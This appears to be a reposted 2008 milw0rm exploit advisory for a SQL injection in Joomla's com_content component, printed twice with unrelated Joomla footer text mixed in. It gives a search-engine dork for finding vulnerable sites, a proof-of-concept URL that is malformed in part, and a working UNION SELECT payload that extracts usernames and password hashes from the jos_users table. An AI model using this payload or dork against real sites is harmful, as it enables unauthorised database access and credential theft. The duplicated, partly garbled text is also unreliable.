Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln _Exploit_网络安全_
-------------------------------------------------------------------------------------------
Joomla Component com_content SQL Injection Vulnerabity
-------------------------------------------------------------------------------------------
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*
------------------------------------------------------------------------------------------------------------------------------------
Greetings : h4ck-y0u.org
side note:
Página de contenido
Projecte Joomla!
July 2004
(C) 2005 Open Source Matters. All rights reserved.
http://www.gnu.org/copyleft/gpl.html GNU/GPL
admin@joomla.org
www.joomla.org
1.0.0
# milw0rm.com [2008-07-08]
Joomla Component com_content SQL Injection Vulnerabity
-------------------------------------------------------------------------------------------
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*
------------------------------------------------------------------------------------------------------------------------------------
Greetings : h4ck-y0u.org
side note:
# milw0rm.com [2008-07-08]
